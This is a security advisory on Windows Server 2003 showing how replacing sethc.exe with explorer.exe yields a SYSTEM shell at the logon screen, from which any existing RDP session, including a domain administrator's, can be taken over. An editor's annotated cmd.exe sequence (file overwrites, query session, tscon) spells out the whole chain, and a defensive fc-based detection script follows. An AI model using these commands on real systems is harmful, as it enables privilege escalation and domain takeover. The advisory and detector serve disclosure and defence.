Affected version: Windows Server 2003 (others not tested)
Details: The Windows built-in SYSTEM account holds privileges above every other account. Without knowing any other account's password, SYSTEM can take over that account's logon session directly, as long as the session still exists (active or disconnected). In an AD domain environment this is especially severe: an attacker can take control of the entire domain by taking over a domain administrator's session, needing nothing more than an initial foothold on a domain-member machine on which a domain administrator session is present.
Test Cases:
1. Log in to the server over Remote Desktop with the Testsystem account. In the Users tab of Task Manager the test account's session is visible; right-clicking it and choosing the remote takeover (Connect) prompts for that account's password. Because we do not have the test account's password, we cannot take over the session (even for an attacker, changing the administrator's password is not a convenient option).
2. Everyone knows that Windows has the built-in SYSTEM account. Using the Testsystem account, replace C:\windows\system32\sethc.exe with a copy of Explorer.exe. Disconnect the remote session, log back in, and press Shift five times at the logon screen: Sticky Keys launches sethc.exe, which is now Explorer.exe, and a SYSTEM desktop appears. We now have direct access to the SYSTEM account.
Note: The logon dialog does not disappear at this point. From this we can conclude that before any user has logged on, most of the system's early initialisation runs as SYSTEM. This is far more dangerous than a local overflow.
3. From the SYSTEM account you can now take over any session directly without knowing its password. The precondition, of course, is that the session still exists (a server that is managed remotely usually has sessions left disconnected rather than logged off). A session that has been logged off is gone and cannot be taken over.
4. Testing in a domain environment shows that if a domain administrator session exists on the machine, it can be taken over directly without any password. This is especially serious: once an attacker controls a single machine, privilege escalation to control of the entire domain becomes far less trouble.
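The whole chain from test cases 2 to 4, written out as the cmd.exe commands a tester would type on the Windows Server 2003 host. This is an added example and not commands from the original advisory; it assumes the Testsystem account is a local administrator (it must be, to write into system32), that %SystemRoot% is C:\WINDOWS, and that the target session has ID 2. The dllcache step and the tscon command are the editor's additions: the advisory does the takeover through Task Manager's Users tab, and tscon is the command-line equivalent of that right-click. It is an annotated sequence with a logoff and logon in the middle, not a script to run in one go.

```batch
rem ---- Test case 2: run as the administrator account over RDP ----
rem Keep a backup of the real Sticky Keys binary, then put explorer.exe in its place.
copy /y "%SystemRoot%\system32\sethc.exe" "%SystemRoot%\system32\sethc.exe.bak"
copy /y "%SystemRoot%\system32\explorer.exe" "%SystemRoot%\system32\sethc.exe"
rem Caveat (editor's assumption, not something the advisory tested): Windows File
rem Protection keeps a pristine copy under system32\dllcache and may silently restore
rem it. If sethc.exe reverts after a short while, replace the dllcache copy as well.
copy /y "%SystemRoot%\system32\explorer.exe" "%SystemRoot%\system32\dllcache\sethc.exe"

rem Now disconnect the RDP session, reconnect, and press Shift five times at the
rem logon screen. winlogon starts sethc.exe (now explorer.exe) as SYSTEM while the
rem logon dialog stays on screen. From that desktop open a command prompt
rem (Start > Run > cmd); Task Manager's Processes tab shows its user as SYSTEM.

rem ---- Test cases 3 and 4: run inside the SYSTEM command prompt ----
rem List Terminal Services sessions: ID, user name and state (Active / Disc).
query session
rem Attach session 2 (for instance a disconnected domain-admin RDP session) to the
rem console. Because the caller is SYSTEM there is no password prompt; any other
rem caller would have to pass the session owner's password via tscon's /password
rem option, which is exactly what test case 1 ran into in Task Manager.
tscon 2 /dest:console

rem ---- Cleanup once finished: put the real Sticky Keys binary back ----
copy /y "%SystemRoot%\system32\sethc.exe.bak" "%SystemRoot%\system32\sethc.exe"
```

The takeover works for a disconnected session as well as an active one; a session that was logged off no longer appears in `query session` and cannot be attached, which is the limit noted in test case 3.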
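A defensive check to go with the advisory, added by the editor and not part of the original text: the replacement in test case 2 leaves sethc.exe byte-for-byte identical to the shell that was copied over it, so a plain binary comparison catches it without any hash database. The check generalises beyond the page to utilman.exe (the other accessibility binary commonly abused the same way) and to cmd.exe as a replacement; both are assumptions about what an attacker might use rather than anything the advisory tested. It relies on fc, which is built into every Windows version including Server 2003.

```batch
@echo off
rem fc /b exits 0 when the two files are byte-identical, 1 when they differ,
rem and 2 when one of them cannot be opened.
setlocal
set S32=%SystemRoot%\system32
set FOUND=0
for %%A in (sethc.exe utilman.exe) do (
  for %%S in (explorer.exe cmd.exe) do (
    fc /b "%S32%\%%A" "%S32%\%%S" >nul 2>&1
    if not errorlevel 1 (
      echo [!] %S32%\%%A is byte-identical to %%S - accessibility binary replaced
      set FOUND=1
    )
  )
)
if %FOUND%==0 echo [ok] no accessibility binary matches a shell binary
endlocal
```

Run it from an elevated prompt on each terminal server; a positive result means someone with administrator rights has already prepared the logon screen, and the disconnected sessions on that host (test cases 3 and 4) should be treated as exposed.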